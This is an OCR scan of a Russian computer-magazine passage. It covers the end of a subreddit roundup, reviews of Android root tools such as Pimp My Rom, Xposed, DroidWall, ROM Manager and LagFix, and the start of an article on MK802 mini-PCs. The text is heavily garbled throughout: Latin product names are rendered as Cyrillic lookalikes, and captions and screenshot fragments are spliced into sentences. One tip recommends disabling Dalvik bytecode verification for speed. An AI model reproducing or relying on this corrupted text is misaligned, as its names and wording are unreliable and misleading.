основное правило — в 1АМА требуют доказательств того, что ты тот, 
за кого себя выдаешь (можно отправить их напрямую модераторам). 
В остальном ограничений практически нет, что и делает сабреддит та- 


ким интересным. Здесь бывали многие известные люди, включая президента Барака Обаму 
и Билла Гейтса. Здесь множество представителей редких и необычных профессий, а также 


Чайургодгаттег 


ТМУСОБЕ 


Еще один сабреддит с говорящим названи- 

ем — здесь размер имеет значение, здесь 

любят и почитают лаконичный и вырази- 

тельный код практически во всех его про- 

явлениях. /г/тусоае, скорее всего, при- 

дется по душе тем, кого выше заинтересовал 

:). Как известно, минимизация 

кода — своего рода искусство, и здесь это искусство ценят 

по достоинству. Лаконичность кода тут рассматривают как с точ- 

ки зрения спортивного интереса (периодически в /г/Чпусоае даже 

проводятся разнообразные челленджи), так и с точки зрения прак- 

тичности. Веб-сервер на 42 строчки кода? Отлично! МИК!-движок, 

который меньше обычного М\С-контроллера? Замечательно! А также безумные игры ми- 
кроскопического объема, крошечные эксплойты, компактные ореп $оигсе решения, при- 
званные заменить тяжелое и неудобное ПО, и многое другое. Одним словом, данный саб- 
реддит приветствует любые изящные и компактные решения, и здесь будут рады оказать 
посильную помощь в их создании и дать совет. 


МИЛЛИОНОВ 
УНИКАЛЬНЫХ 
ПОЛЬЗОВАТЕЛЕЙ 


ПРОСМАТРИВАЮТ 


КЕОБВИ 5 МИЛ- 
ЛИАРДОВ РАЗ 
В МЕСЯЦ 


необычных и экстравагантных личностей. Словом, это великолепный таймкиллер. 


ТИ (ТОРАУТЕЕАВМЕО) 


И еще один крайне популярный сабреддит, у которого почти три 
с половиной миллиона читателей, — /гЛодауЙеагтеа (сегодня 
я узнал). Идея сабреддита проста, как и все гениальное, — все 
мы каждый день узнаем нечто новое. Это могут быть какие-то 
мелочи или что-то, способное поставить всю нашу жизнь с ног 
на голову. Так почему бы не поделиться этим с другими? Пра- 
вила просты: публиковать узнанное нужно без личного мнения 
(«сегодня я узнал, что М — отличный фильм» — не допускает- 
ся). Нужно давать релевантные ссылки. Важно, чтобы новости, 
посту, видео и так далее было не больше двух месяцев, в про- 
тивном случае источник считается устаревшим. В итоге в этот 
сабреддит стекаются самые разные, безумные, удивительные, 
шокирующие и забавные публикации со всей Сети. К примеру, 
у Джими Хендрикса, оказывается, была синэстезия — он в бук- 
вальном смысле мог видеть музыку. А шоколадное молоко при- 
думали в Ирландии :). 


МОРАР /"РОРМ 


Но что-то мы все о популярном и очевидном. Завершая под- 
борку, приведу пример того, что на гедай есть не только та- 
кое. /г/потар — совершенно реальное сообщество анонимных 
(и не очень) порноголиков. Ничего смешного здесь, увы, нет. 
Убедиться в этом можно, посмотрев, к примеру, это выступле- 
ние сТЕШО: уоци.белмзЕ82Ам5 019, где рассказывается и о про- 
блеме, и о комьюнити, которое борется с ней и помогает друг 
другу. Во многом эти ребята переняли практику анонимных 
алкоголиков и других подобных групп — у них существует своя 
система беджей, своего рода саппорт группы и прочее. Все се- 
рьезно, и этот сабреддит читают почти 60 тысяч человек. Одна- 
ко, упомянув порноголиков, нельзя умолчать о том, что на гедай 
существуют тысячи сабреддитов вида *рогт, где вместо звез- 
дочки может быть что угодно — ГооЧаРогт, МЙЙагуРогт, СипРогпт, 
НитапРогт. Что характерно, настоящего порно нет даже в по- 
следнем сабреддите. Слово «порно» здесь фигурирует в куда 
более широком смысле. Это скорее клубы по интересам, где 
фото красивого блюда или крутой пушки вызывает бурю эмо- 
ций и обильное слюноотделение. == 


Х-МоБПе 
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Обзор из а бинструментое для рутованного Апаго4 


№, 


Любой андроидовод знает, что такое гост, а многие специально получают его 

для выполнения разного рода сервисных задач и запуска специализирован- . 
ного софтак Теме менее далеко не всем известно, какие на самом деле воз- 

можности. Крывает наличие гос{-доступа на девайсе. В этой статье я расска- Евгений Зобнин 


жуо десяй незаменимых гоо приложениях, которые существенно расширят 
ср ам аппарат 
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РИМР МУВОМ (ВЕТА) 


ОС: Апаго 2.1 ивыше 
САЙТ: 
ЦЕНА: бесплатно 


Ритр Му Вот — это один из самых богатых 
на возможности гоф-инструментов, доступных 
в маркете. С его помощью к Апаго можно при- 
менить практически все существующие твики, 
установить модификации, включить эксперимен- 
тальные функции, разогнать процессор и многое, 
многое другое. Фактически я бы мог написать це- 
лую статью об этом инструменте, и мне бы даже 
не хватило места, чтобы сказать обо всем. Тем 
не менее писать целую статью все-таки излишне, 
так как значительная часть твиков не пригодится 
большинству пользователей, а некоторые просто 
не сработают. Вместо этого я расскажу, как с по- 
мощью Рипр Му Вот выполнить частые и наибо- 
лее необходимые настройки и твики. Итак, хит- 
парад из десяти моих любимых настроек: 


Активация поддержки шк.а. Каталог /&4с/тй.а 
в Ипих-системах выполняет функцию систе- 
мы автозагрузки. Любой скрипт или команда, 
скопированная в него, будет выполнена во 
время загрузки девайса. Стоковые прошивки 
не имеют поддержки шин.а, но ее легко в них 
добавить с помощью Ритр Му Вот: Тоо|$ -> 
Цпмегза пк.а Зиррой — Асй\ате. 

Разгон, алгоритм энергосбережения и пла- 
нировщик ввода-вывода. Все это можно из- 
менить с помощью раздела Тоо!$ —> Ритр Му 
СРЧУ. В качестве алгоритма энергосбережения 
(Со\егпог) лучше выбрать ищегасН\е(х) или 
эзтацЦа$$, а в качестве планировщика ввода- 
вывода (10 Зспеадщег) — зю или аеаа!пе. 
Запрет выгрузки приложений из памяти. Если 
ты часто используешь какое-либо приложение 
или несколько приложений, то есть смысл за- 
претить их выгрузку при нехватке свободной 
памяти: Тоо|$ —> Шоск Арр$ ш Метогу. В этом 
случае выбранные софтины всегда будут за- 
пускаться моментально. С другой стороны, 
при запуске тяжелого софта (например, игр) 
их придется вручную выгружать из памяти 
с помощью таск-киллера. 

Инженерное меню смартфона. В Апаго есть 
скрытое меню настроек, с помощью которо- 
го можно изменить некоторые параметры 
устройства (например, запретить переходить 
на 2@ в условиях плохого сигнала ЗС), но, 
чтобы получить к нему доступ, необходимо 
набрать в номеронабирателе комбинацию 
*+=*#4637+“#^ или просто зайти в меню Тоо[$ — 
Оемсе Наадеп Мепи программы Ритр Му Вот. 
Включение сжатия оперативной памяти. Шпих- 
ядро некоторых прошивок включает в себя 
драйвер 2НАМ, который позволяет превра- 


тить часть оперативной памяти устройства 
в виртуальный своп со сжатием данных. Вклю- 
чение этого драйвера позволяет расширить 
объем оперативной памяти практически за- 
даром. Сделать это с помощью Ритр Му Вот 
можно так: Тмеак$ —> МиШазкта -› 2Ват 
Сотргеззюоп -> 128 ть. 

Отключение проверки на ошибки и провер- 
ки байт-кода при установке приложений. 
В Апаго есть два механизма проверки кода 
приложений на безопасность. Это проверка 
кода ГБамк во время установки приложения 
и проверка на ошибки исполнения запуска на- 
тивного кода. Отключив их, мы получим более 
быстрое исполнение и установку приложений: 
Тммеак$ —>› ВамКк \М —> Вамк УМ! Егтог Спескто 
/ Бамк В\есоае \Мепйсаноп - ОН. 
Принудительная отрисовка с помощью гра- 
фического процессора. Начиная с версии 
4.0, Апаго4 умеет отрисовывать интерфейс 
приложений с помощью СРЧЦ, благодаря чему 
достигается высокая плавность его работы. 
Однако, чтобы это происходило, приложение 
должно подтвердить необходимость такой от- 
рисовки, иначе все пойдет по старинке, через 
СРЧ, с тормозами. Чтобы заставить Апаго!а 
рисовать интерфейс всех приложений с по- 
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мощью СОРИ, можно установить такой флажок: 
Тмеак$ —› Гогсе ОРУ Вепаеппа -»› Оп. Имей 
в виду, что это может привести к сбоям при- 
ложений. 

Запрет на выгрузку рабочего стола из памяти. 
Наверняка ты сталкивался с таким поведени- 
ем смартфона, когда после нажатия на кнопку 
«Домой» сначала появлялся черный экран, 
а лишь затем рабочий стол, иконки и видже- 
ты. Это происходит потому, что рабочий стол 
был выгружен из памяти и теперь запускает- 
ся снова. Чтобы избежать этого, можно за- 
ставить систему всегда держать его в памяти: 
Тмеак$ —> Шоск Гаипспег т Метогу -+ Оп. Од- 
нако это будет стоить тебе 30-50 Мб памяти. 
Оптимизация баз данных. Апаго@ использует 
базы данных ЗОЦЁе везде, где только возмож- 
но. Со временем эти базы данных фрагмен- 
тируются, и выборка информации из них про- 
исходит медленнее. Чтобы избежать этого, 
можно заставить смартфон оптимизировать 
базы данных при каждой загрузке системы: 
Тмеак$ —› Оритте зайеЗ3 Ваара$е$. 
Сохранение заряда батареи. Есть множество 
способов сократить расход батареи. Все 
их можно применить с помощью одной на- 
стройки: Тмеак$ —> ВаКегу Зампд$з. 


Выбираем алгоритм 
энергосбережения 
в Рипр Му Вот 
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ХРОЗЕО 


ОС: Апагоа 4.0 ивыше 


САЙТ: аоо.9/41В2у 
ЦЕНА: бесплатно 


Как известно, кастомные консоли восстановле- 
ния, такие как СоскмогКМоа и ТМ/ВР, позволя- 
ют устанавливать не только прошивки целиком, 
но и отдельные их части. Например, ядро, драй- 
веры или другие системные компоненты можно 
без каких-либо проблем установить отдельно 
и поверх уже существующей прошивки. 

Как результат такой возможности, в Сети по- 
явилось множество модов, которые позволяют 
изменять функционал стоковых и других про- 
шивок в разные стороны с помощью установки 
небольших обновлений поверх основной про- 
шивки (один из самых популярных — круговая 
батарея). Однако у таких модов есть несколько 
проблем, основные из которых — это частая 
ориентированность только на одно устройство 
или одну прошивку и необходимость перезагру- 
жаться в консоль и выполнять установку вруч- 
ную. 

Чтобы разобраться с этой проблемой, юзер 
го\уо89 с ХОА Оеуеорег$ придумал оригиналь- 
ное решение. Он модифицировал системный 
фреймворк Апаго!4 таким образом, чтобы любую 
его функцию можно было перехватить и поме- 
нять на собственную реализацию. В результате 
появилось приложение Хрозеа, которое позво- 
ляет заменить стандартный Апагоа-фреймворк 
модифицированным и реализует интерфейс 
для подключения модулей, то есть модифика- 
ций, созданных другими разработчиками. 

Проект еще достаточно молодой, но за вре- 
мя его существования уже были реализованы 
следующие вкусности: 

. ХГПпетеЕпате (ч00.а/ЕЗХМт) — движок 
тем, аналогичный тому, который использует- 
ся в СуаподепМоч. К сожалению, несовме- 
стим с его темами. 

. отйеу Вер!асег (чоо.а!/Впре9) — заменяет 
стандартный набор смайлов на более вме- 
няемый. 


ЭСВЕЕМ ЗТАМОВУ 


ОС: Апаго 2.0 ивыше 


САЙТ: аоо.а/ЛИ8а 
ЦЕНА: бесплатно 


Одна из наиболее удручающих особенностей реа- 
лизации поддержки НОМ! в Апагоа — это необхо- 
димость держать экран включенным. По умолча- 
нию картинка всегда выводится на основной экран 
смартфона или планшета, а при подключении 
внешнего экрана по НОМ! она просто масштаби- 
руется и дополнительно выводится на «болышой 
экран». Как результат, мы имеем две проблемы: 
отстойное качество картинки на телевизоре или 
мониторе из-за масштабирования и дублирова- 
ние картинки на двух экранах. С первым ничего 
нельзя сделать по технической причине, зато вто- 
рую можно решить с помощью приложения Зсгееп 
Запабу, которое принудительно отключает за- 
днюю подсветку экрана, так что можно спокойно 
смотреть видео или играть в игры, не отвлекаясь 
на копию изображения на планшете. 

Зсгееп З{апабу позволяет нажатием кнопки 
отключить подсветку, также у него множество 


‚  ТМеакБох (аоо.а1/ЕО61г) — на- 


бор из большого количества 
твиков. В комплекте: набор 
фонов и вариантов отображе- 
ния сигнала для статусбара, 
эффект старого телевизора 
при выключении экрана, воз- 
можность записи звонков, 
возможность изменения дей- 
СТВИЯ КНОПКИ «Домой», пере- 
ключение композиций ка- 
челькой громкости и многое 
другое. Само собой, твики 
можно включать по отдельности. 

‚ Арр5еИтод$ (аоо.а/ТОТиО) — добавляет воз- 
можность изменения настроек для каждого 
приложения на манер Рагапо!а Апагога. На- 
пример, для каждого приложения можно от- 
дельно изменить ОР!, размер шрифта, язык, 
скрыть статусбар, переключить ориентацию 
экрана и даже отозвать привилегии. 

. ТаеТпододег (аоо.с!ЛХ94У) — переключает 
интерфейс между телефонным, планшетным 
и телефонно-планшетным режимами. 

. АГарр$ ш Р!ау Зтоге (доо.9/айМЕ) — позво- 
ляет получить доступ ко всем приложениям 
в маркете, даже тем, которые разработчик 
пометил как несовместимые. 


Теперь о том, как все это использовать. 
Для начала установи инсталлятор Хрозеа (400. 
о/ММм/7 9). После запуска следует нажать кноп- 
ку «Установить/Обновить» на главном экране. 
Смартфон перезагрузится, после чего будет го- 
тов принять модули. Сами модули распространя- 
ются в виде обычных АРК-пакетов, устанавливае- 
мых стандартным способом. После установки их 
необходимо активировать на вкладке «Модули» 
в инсталляторе Хрозес, а затем тапнуть по иконке 
модуля в меню приложений для его настройки. 


весьма полезных настроек, например отклю- 
чать экран разными способами (для ЕЕО- и ТЕТ- 
экранов) и отключать подсветку самостоятель- 
но при подсоединении НОМ!-кабеля. Для этого 
достаточно включить опцию АЩщо НОМИМНЕ 
Оцесйоп в разделе НОМ! Ощесйоп (там же есть 
и настройки отключения при запуске приложения 
или помещении в док). 

В последних версиях Зсгееп Запабу также 
появились две очень полезные функции: тачпад 
и пульт удаленного управления. Первая превра- 
щает экран устройства в самый настоящий тач- 
пад, с помощью которого можно управлять кур- 
сором на экране, вторая — это пульт удаленного 
управления, включающий в себя функции нави- 
гации, клавиатуры и управления медиаплеером. 
Для его работы необходимо установить програм- 
му на оба устройства, а дальше воспользоваться 
автоматическим поиском с одной из сторон. 


Список модулей после 
установки будет пуст 
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В инсталляторе Хрозеа - © 
достаточно просто 
нажать «Установить». 


Хрозед пз1аПег 


СИСТЕМА МОДУЛИ 
Здесь вы можете установить 
Хро$ед систему. Это база для 
модулей, которые могут изменить 
поведение и внешний вид вашего 
гелефона Апаго. Для получения 
дополнительной информации 
смотрите 


Версии 


Установить/Обновить 


Удаление (восстановление 
арр_ргосе$$) 


Очистка (полное удаление) 


= © 


Хрозед пз{аПег 


СИСТЕМА МОДУЛИ 


Хрозе4 модули не найдены! 


ической т.м 
Зафее еско |9 
мешаниной Л апобу „ Гепа слое 
издизайна 9 © 

Мено и Ноо и 

в Зсгееп $З{апаБу 


скрывается куча 
полезностей 


вип обр пРетЫНИТы 
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РОГЕ$СВЕЕМ 


ОС: Апагога 3.0 и выше 
САЙТ: нет 
ЦЕНА: бесплатно 


Начиная с версии 3.0, в Апаго появилась строка 
наэкранных клавиш управления, которая заме- 
нила собой аппаратные кнопки «Домой», «Назад» 
и «Меню», а также включила в себя функциональ- 
ность статусбара на планшетах. Это правиль- 
ный и логичный шаг со стороны Сооде, однако 
благодаря толстой строке внизу экрана, которая 
скрывается только при использовании стокового 
плеера и УочТибе, полезное пространство экрана 
исчезает в никуда (что особенно неприятно в слу- 
чае со смартфоном). 

Стандартной возможности скрыть строку 
в Апагога нет и никогда не появится, поэтому при- 
ходится выкручиваться собственными силами. 
Один из способов сделать это — установить при- 
ложение Тизсгееп. Оно делает ровно то, о чем го- 
воритего название, — скрывает строку и развора- 
чивает интерфейс приложения на полный экран. 

Чтобы оставить пользователю возможность 
возвращаться к предыдущему приложению или 
к домашнему экрану, Ти!з$сгееп создает в углу 
экрана (или даже в обоих углах) небольшую полу- 
прозрачную кнопку, при нажатии на которую появ- 
ляются стандартные клавиши навигации. То, какие 
клавиши будут доступны пользователю, какой бу- 
дет кнопка и что вообще она будет делать, можно 
настроить через окно настроек приложения. 

Стоит отметить, что в полноэкранном режиме 
нормально себя ведут только обычные приложе- 
ния. При запуске же Ореп@!-игр могут возникнуть 


ЕМТЕАОМСНЕВ 


ОС: Апагоа 3.0 ивыше 


САЙТ: аоо.9/2904 
ЦЕНА: бесплатно 


В стандартном браузере Апагоа 4.0 появилась 
интересная экспериментальная функция, смысл 
которой заключается в том, чтобы убрать с экра- 
на любые элементы управления браузером 
и разместить их в небольшом круговом меню, ко- 
торое появляется после прикосновения к право- 
му краю экрана. Несмотря на инновационность 
и удобство использования, функция так и не ста- 
ла стандартным элементом браузера, однако 
идею быстро взяли на вооружение независимые 
разработчики. 

Через некоторое время подобная функ- 
циональность появилась в приложении (МТ 
аипсйег, предназначенном для создания альтер- 
нативной системы управления смартфоном в том 
случае, если у тебя отказали аппаратные клави- 
ши навигации или если ты хочешь использовать 
все рабочее пространство экрана на смартфоне 
типа Са!аху Мехи$. До этого в ЕМТ ЁГаипспег были 
доступны довольно дурацкие способы замены, 
такие как многопальцевые жесты и создание не- 
видимых кнопок управления в углах экрана. 

С версии 0.8 здесь появилась и поддержка 
так называемого режима РИЕ, точно повторяюще- 
го функциональность стокового браузера. Теперь 
РЕ используется в ЕМТ Ёаипспег по умолчанию 
и доступен через прикосновение к правой сто- 
роне экрана. Само собой, его можно легко пере- 
весить на любую другую сторону экрана, а также 
изменить количество и назначение кнопок. 


Свита короля 
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Морг 


Нот 
Е О 


Беня 


интересные глюки. По каким-то причинам система 
распознавания прикосновений начинает считать, 
что изображение на экране находится ниже, чем 
есть на самом деле, так, как будто если бы при ис- 
чезновении строки навигации изображение сдви- 
галось вниз. В результате прикосновения сраба- 
тывают не там, где нужно. 

В СуаподепМоа и многих других кастомных 
прошивках, кстати, такая функциональность 
встроена, и при ее активации описанных глюков 
не наблюдается. 


В качестве дополнительной функциональ- 
ности доступны долгое нажатие на кнопку 
(например, долгое нажатие кнопки «Назад» 
приведет к закрытию и выгрузке текущего при- 
ложения из памяти) и показ дополнительной 
информации, такой как текущее время и дата 
(на случай, если статусбар также спрятан). 
Все это гибко настраивается и действительно 
удобно в использовании, особенно на смарт- 
фонах с большим экраном, где дотягиваться 


т 


;. МЕО 


Возможность устанав- 
ливать сразу несколько 
р файлов прошивки есть, 
кроме ВОМ Мападег, 
в приложении Ао 
Назпег. 


Интересно, что, если по- 
искать в маркете другие 
приложения Рагадоп 


Вместо строки ЗоН\маге, 90% из них 
состояния теперь окажутся различными 
небольшая кнопка словарями, стоимость 
в углу экрана которых доходит 

до 1000 рублей. 


Таквыглядит ЕМТ. 
Простои со вкусом 


до стандартных клавиш навигации не очень 
удобно, и на больших планшетах, где проще 
дотронуться до края экрана пальцем, чем тя- 
нуться к его нижней части. 

К слову сказать, совсем скоро после МТ 
Гаипсйег точно такая же функция появилась 
в прошивке Рагапо!а Апаго!а 3, откуда она в на- 
чале года была портирована в СуаподепМоа, 
правда, в очень урезанном и не таком эффект- 
ном виде. 
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ОВОТО\М/АЕЬ 


ОС: Апагоа 1.5 ивыше 
САЙТ: 
ЦЕНА: бесплатно 


„| @ 


В Огоа\/ай 
неугодным 


В ядро Шпих встроен один из самых развитых, 
функциональных и производительных брандма- 


уэров среди всех операционных систем. Однако № . -.ъ приложениям 

в Апаго@ он никак не используется, что вполне м, у Ого!а\/а! 1.5.1 можно легко 
логично, если учитывать мобильный характер Ех запретить доступ 
операционной системы. кза 


Тем не менее было бы очень удобно с помо- 
щью возможностей встроенного файрвола регу- 
лировать то, какие приложения и в какие моменты 
могут получать доступ к Сети. Зачем, например, 
разрешать играм выходить в интернет и исполь- 
зовать эту возможность для показа рекламы? 
Или зачем разрешать фотокамере делать аплоад 
фотографий в бооЧ/е+ по ЗС, когда это можно сде- 
лать дома, подключившись к сети М/-Е!? 

Именно это позволяет сделать простое при- 
ложение под названием Огоа\\ай. По сути, оно 
просто выводит на экран список приложений 
и позволяет расставить галочки напротив тех, ко- 
торые должны иметь доступ к интернету, и снять 
с тех, что не должны. Опционально можно раз- 
дельно регулировать доступ к мобильным сетям 
и ММ-[!, благодаря чему можно серьезно сэконо- 
мить на мобильном трафике. 


узволяет огр 


оженНИиИ мые 


зование Ого Аа: 
е на РЕЖИМ ДЛЯ 
ли Белый список и 


10007: СМ Ирдатет 
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9 © о | САИТ: 

в в ЦЕНА: бесплатно / 185 руб. 


МЕО 


Для выполнения таких операций, как установка 


| © 
прошивок или создание Мапагоа-бэкапа теку- 


— 


Брандмауэр есть ивне- 
которых антивирусных 
продуктах, например 
в Ауа${ МобИе зесигцу. 


щей прошивки, в Апаго!а-девайсах используется 
консоль восстановления (гесоуегу), в которую 
приходится самостоятельно перезагружаться, 
зажав специальные клавиши, а затем долго хо- 


ВОМ Мападег Ргептиит \5.5.2.3 


РЕЖИМ НЕСОУЕКВУ 


Настроики ВОМ Менеджера 


НАСТРОИКА 


Уведомления 


Весоуегу З@ир 
дить по меню в поисках нужных функций и фай- обновлений 
лов прошивки. Чтобы облегчить этот процесс, * всоуегу и \о Па ю гез1ог Уведомления 
Кушик Дутта, автор С!оскмогкКМоа Весоуегу, на- Е Показывать 
писал приложение НОМ Мападег, которое по- рекламу 
зволяет проделать многие из этих операций, во- кафе Ао умел: Поддержите | 
обще не касаясь консоли восстановления. Менедж. 
Бесплатная версия приложения позволяет 
установить консоль восстановления, скачивать 
и устанавливать прошивку и создавать Мапагоа- 
бэкапы с помощью нескольких тапов. Заплатив 
185 рублей, ты получишь в придачу возможность 
выкачивать дельта-обновления прошивок, авто- 
матическое уведомление о выходе новой версии 
прошивки, автоматические бэкапы, а также воз- 
можность управлять через браузер и сохранять 
бэкапы на удаленном сервере. Особый плюс — 
так называемые цепочки установок, то есть воз- 
можность последовательной установки сразу не- 
скольких файлов прошивки, например, сначала 
саму прошивку, затем кастомное ядро и Саррз. 


А Загрузить режим Весоуегу 
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Свита короля 


РАВАСОМ МТР5 & НЕЗ-+ 


ОС: Апаго 2.3.3 ивыше 
САЙТ: млм. рагааоп-зоН\маге.соп 
ЦЕНА: бесплатно 


По умолчанию на внешних накопителях Апагоа 
поддерживает только файловые системы ГАТ 
и ехРАТ. Это не очень хорошо, так как многие 
предпочитают форматировать карты памяти 
больших объемов, а также флешки и внешние 
жесткие диски в более подходящие для этого 
файловые системы. Линуксоиды — в ехё2, поль- 
зователи МИ/пао\м$ и ОЗ Х — в МТЕ$ и НЕЗ+. 
Однако если проблема первых решается до- 
вольно просто с помощью уже интегрированно- 
го в ядро драйвера, то вторым живется похуже. 
По умолчанию стоковые ядра вообще не вклю- 
чают в себя драйверы МТЕ$ и НЕЗ+, а кастомные 
если и включают, то не позволяют их использо- 
вать, что называется, из коробки. К счастью, ре- 
шить эту проблему довольно просто, если вос- 
пользоваться приложением Рагадоп МТЕ$ & НЕЗ+. 
Приложение включает в себя драйвер, атакже 
прослойку для автомонтирования накопителей. 
По сути, все, что необходимо сделать, — это про- 
сто установить софтину, запустить и забыть о ней. 


АРРЗУМС 


ОС: Апаго 2.2 ивыше 


САЙТ: аоо.9/\м9075$ 
ЦЕНА: бесплатно 


В Апаго нет встроенной функции синхрониза- 
ции настроек приложений между устройствами. 
Если у тебя телефон и парочка планшетов, на- 
страивать приложения, вбивать пароли и заново 
проходить игры придется три раза. Хитрые юзе- 
ры придумали способ синхронизации с помо- 
щью облачных бэкапов, но это костыль. 
Приложение АррФупс позволяет полностью 
автоматизировать процесс обмена настройками 


ГАСЕХ 


ОС: Апаго 2.2 и выше 
САЙТ: нет 
ЦЕНА: бесплатно 


Наверняка ты замечал, что со временем, 
при заполнении внутренней памяти, смартфон 
начинает притормаживать, а количество сво- 
бодного пространства при этом оказывается 
меньше, чем об этом заявляет операционная 
система. 

Корень такого поведения — особенность ра- 
боты МАМО-памяти, которая требует, чтобы пе- 
ред записью новых данных в ячейку памяти ста- 
рые данные были из нее явно стерты. Однако, 
поскольку при удалении файлов файловая си- 
стема не сообщает МАМО-контроллеру об этом 
событии и просто помечает файлы как удален- 
ные, начинаются проблемы несогласованно- 
сти. При следующей записи данных файловая 
система может выбрать как раз те блоки, ко- 
торые принадлежали уже удаленному файлу, 
и контроллеру приходится проверять, записаны 
ли в ячейки, привязанные к блоку, какие-то дан- 


©! $ А х = Е, ^ | 27 09:35 


Рагароп МТЕ$&НЕ$+ 


/4ем/оскК/ттсЬК1р1 


Моиптед оп: /тпИ$асага 


> 


/Чем/ЬюосК/ттсЫК1р2 - Мему Моите 


Могтоицитей. 


Наиболее дотошные могут также воспользовать- 
ся простеньким интерфейсом программы для ма- 


между несколькими приложениями одной \М/-Е-- 
сети. Для этого достаточно установить Арр5Зупс 
на оба девайса, указать имя устройства и пароль 
для доступа кнему. Сразу после запуска Арр5упс 
на другом устройстве оно появится в списке. Да- 
лее можно выбрать необходимые приложения, 
и их данные будут загружены на устройство. Рго- 
версия приложения также поддерживает син- 
хронизацию через МЕС и облачные диски. 


ные, и, если это так, удалять их, а лишь затем 
писать данные нового файла. 

Все это приводит к тому, что при длительном 
использовании МАМ\О-памяти почти все ячейки 
оказываются заняты либо существующими, 
либо уже удаленными файлами и при каждой 
записи новых данных происходит, во-первых, 
поиск действительно незанятых ячеек, а во- 
вторых, их очищение перед записью. В резуль- 
тате скорость записи данных существенно пада- 
ет (в среднем в два-три раза), а сам смартфон 
начинает тормозить. 

Чтобы избежать этого, можно запустить кон- 
сольную команду 1${ит, которая принудительно 
очистит ячейки, принадлежащие уже удаленным 
файлам, и, таким образом, позволит в будущем 
записывать данные сразу. Можно также вос- 
пользоваться приложением 1адНх. Достаточно 
просто запустить его и нажать кнопку «Вип!». = 


Рагадоп можно 
использовать и 
для подключения 
ФСвручную. Точку 
подключения 
можно выбрать 
самостоятельно 
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Рагароп МТЕЗ&НЕ$+ / СНоозе тоипе роте 


асс! 

| арр-саспе 

#* саспе 
сопйв 


Га 


нуального подключения флешки или форматиро- 
вания в нужную ФС. 


АЧ5епее пПазАбсаго 


| ст СН Нато 


|8 


Ксожалению, 
можно 
синхронизировать 
данные невсех 
приложений 


г ‚ 
с Рене: ВАЛО сы 


Пре рииснеьаыовакииных. Отели ба 
`. > 


Запрос Суперпользователя: 5 


Я Г адЕйх (гп) Егее (152) 


сот. ог едитопКеу 1адйх 


Предоставлять полный доступ всему устройству, включая 
потенциально опасные данные. 


“И Спросить снова: 15 минут 


р 


Запретить 


Без прав гоо{т тут никуда... 


Предоставить 


Х-=МоБПе 


МАЛЕНЬКИЙ 


ИЛИ КАК ВЫЖАТЬ 
МАКСИМУМ 

ИЗ МИНИ-КОМПА — 
НА БАЗЕ АМОВОЮ 


2 


ь 


Примерно два года назад на прилавках китайских магазинов и в интернет-ката- 

логах начали появляться устройства совершенно нового типа: так называемые 

мини-ПК на базе процессоров АРАМ и операционной системы Апаго, оснащен- 9 ` 
ные НОМ]!-выходом. Устройства оказались настолько удачными и популярными, 

что вскоре клоны начали выпускать чуть ли не в каждом втором китайском под- ВИ 
вале, а их продажей занялись даже самые именитые интернет-магазины. апогее! ги 
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МИНИ-ПК? 

Мини-ПК — это полуофициальное название подобных устройств. 
Точнее было бы назвать их ТВ-приставками, однако это почему- 
то не прижилось. Часто используется имя МК802 или МК808, 
в честь первых моделей таких устройств. В любом случае, каким 
бы ни было название, речь всегда идет об устройстве размером 
немногим более флешки, с одной стороны у которого торчит 
НОМ!-выход, а с другой — несколько УЗВ-портов. 

Вся соль в том, что, воткнув такую штуку в порт НОМ! любо- 
го телека, можно тут же без лишних заморочек превратить его 
в тан ТУ, на котором можно смотреть УочТибе-ролики через 
\ММ-Е!-сеть, серфить инет и вообще запускать любой Апагою- 
софт, в том числе тяжелые игры. И все это за каких-то 2000 ру- 
блей, включая НОМ!-кабель и пульт дистанционного управления. 


БЭКГРАУНД 

Одной из первых таких приставок была модель РКотад!с 
мМК802, построенная на базе уже отжившего свое ЗоС А!\мппег 
А1О (с процессором на 1 ГГц, 512 Мб оперативки, графическим 
процессором Ма!-400 МР) и оснащенная Апагом 4.0. Модель 
поступила в продажу в мае прошлого года и сейчас уже не про- 
изводится, уступив место моделям МК802 Ш и МК802 М на базе 
гораздо более производительных двухъядерного Воскстр 
ВКЗО066 и четырехъядерного Роскср ВКЗ188 с 1 Гби2 Гб памя- 
ти соответственно. Кроме НОМ!-выхода, все модели оснащены 
двумя портами птсго0ЗВ 2.0, портом УЗВ 2.0 и слотом псго3О, 
что в совокупности позволяет использовать их в качестве пол- 
ноценных компов с клавой, мышью, большой картой памяти 
либо внешним жестким диском. 

Со временем эта линейка устройств породила огромное 
количество клонов, выпускаемых на самых разнообразных 
китайских фабриках. Наиболее известными из них стали ИМйо 
МХ1 иМХ2 салюминиевым корпусом, очень хорошо отводящим 
тепло, а также линейка Мшх Мео, модели которой (С4, Х5, ХБ, 
ХЗ) мало чем отличались от оригинала. Все они полностью со- 
вместимы с МК8О2 И и, по сути, являются его копией в другом 
корпусе. С выходом модели МК802 М на свет сразу появились 
и соответствующие модели 1МНо ОХ1 и Мшх Х7 на базе четы- 
рехъядерного Роскстр ВКЗ188 с двумя гигабайтами памяти. 

Далее в статье я буду говорить об МНо МХЛ, который хоть 
и несколько устарел, но зато успел обрасти большим количе- 
ством различных руководств, доработок и прошивок, среди ко- 
торых есть Убиты, да и цена у него на 30 долларов ниже. Если 
же ты только собрался заказывать устройство, то рекомендую 
остановиться на ИМНо ОХ1 — кроме дополнительных двух ядер 
и гига памяти, от предыдущей модели он отличается не так уж 
сильно, и многое будет актуально и для него. Стоит только при- 
готовиться к тому, что никаких альтернативных прошивок, не го- 
воря уже об Убиты, для него пока нет. 


ПОКУПКАИ ЗАПУСК 

Купить любое из перечисленных выше устройств можно 
на одном из трех сайтов: Чеаехгеате.сот, Шпудеа!.сот или 
рапдами!.сот. Они почти не отличаются ни качеством обслужи- 


У\УАВММС 


В прошивке Нтез$ ВОМ 
имя устройства замене- 
но на СТ-19100 (Са!аху 
$ |!) для совместимости 
с большим количеством 
приложений в маркете. 
Поэтому не удивляйся, 
увидев Затзипод @а!аху 
5 Ивместо привычного 
МК802 11. 


Содержимое коробки 


Назадней стороне стика 
располагаются два порта 
итстоц$В 2.0, один полнораз- 
мерный порт(ЗВ 2.0, слот 
для карты памяти и светодиод 


вания, ни ценами, ни скоростью доставки, так что выбирай лю- 
бой, вбивай название устройства и нажимай «Виу пом». Пред- 
варительно, конечно, придется сделать кредитку. Примерно 
через месяц посылка придет в местное почтовое отделение. 

Подробно рассказывать о том, как выглядит это чудо, 
я не буду. Все понятно и без описаний, скажу лишь, что за- 
дний писгоЧ$В-порт используется только для питания, поэтому 
подключать в него что-либо, кроме зарядника, не имеет смыс- 
ла. Для включения достаточно воткнуть стик одной стороной 
